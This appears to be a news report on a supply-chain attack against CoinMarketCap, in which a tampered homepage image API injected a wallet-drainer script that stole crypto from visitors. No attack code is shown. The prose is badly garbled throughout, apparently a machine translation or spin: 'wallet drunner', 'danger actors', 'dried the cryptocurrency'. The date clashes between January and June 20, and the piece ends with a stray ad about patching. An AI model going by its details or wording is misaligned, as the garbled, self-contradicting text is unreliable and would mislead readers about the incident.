Coinmarketcap, the popular cryptocurrency price tracking site, faced a website supply chain attack, which exposes site visitors for a wallet drunner campaign to steal the crypto of visitors.
Friday evening, on January 20, coinmarketcap visitors Start seeing web3 popup Asking them to connect their wallets to the site. However, when visitors added their purse, a malicious script dried the cryptocurrency to him.
The company later confirmed that the danger actors used a vulnerability in the site’s homepage “doodle” image, to inject malicious JavaScript in the site.
“On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image had a link that triggers malicious code through an API call, resulting in an unexpected popup for some users when our homepage is visited,” reads a statement. , Posted on X,
“On the search, we worked immediately to remove the problematic material, identified the root cause, and comprehensive measures have been implemented to separate and reduce the issue.”
“We can confirm that all systems are now fully on, and coinmarketcap is safe and safe for all users.”
The cyber security firm C/Side explained that the attack worked by the danger actors who somehow modify a doodle image to modify the API used by the site on the homepage. This tampering Json payload Now included Malicious script tag It injects a wallet dralet script in coinmarketcap from an outer site called “static.cdnkit (.) IO”.
When someone went to the page, the script will perform and display a fake wallet connect popup and shows popup, mimicking a valid web3 transaction request. However, this script was actually a wallet drener designed to steal the property of connected wallets.
“This was a supply chain attack, meaning that Brech targeted its servers of CMC, but a third-party equipment or resources used by CMC,” C/side explains,
“It is difficult to detect such attacks because they exploit reliable elements of a platform.”
More information about the attack came later from a danger actor Known as rayThose who said that the attackers shared a screenshot of the Drener panel on a telegram channel behind the coinmarketcap supply chain attack.
The panel indicated that $ 43,266 was stolen from 110 victims as part of the attack of this supply chain, with danger actors speaking in French on Telegram channel.
Source: Ray
As the popularity of cryptocurrency has risen, there is a threat to wallet drawnrs, usually used in attacks.
Unlike traditional phishing, this type of attacks are often promoted through social media posts, advertisements, spuffed sites and malicious browser extensions that include malicious wallet-drawing scripts.
Reports suggest that wallet drawers stole more than 300,000 wallet addresses in 2024 about $ 500 million through target attacks.
The problem has become so widespread that Mozilla introduced a new system to detect wallet drawers in the recently uploaded browser add-on-on-on-on-on repository.
Patching meant complex scripts, long and endless fire drills. No more.
In this new guide, the tines break down how it is leveling with modern organ automation. Patch fast, reduce overhead, and focus on strategic tasks – no complex script is required.
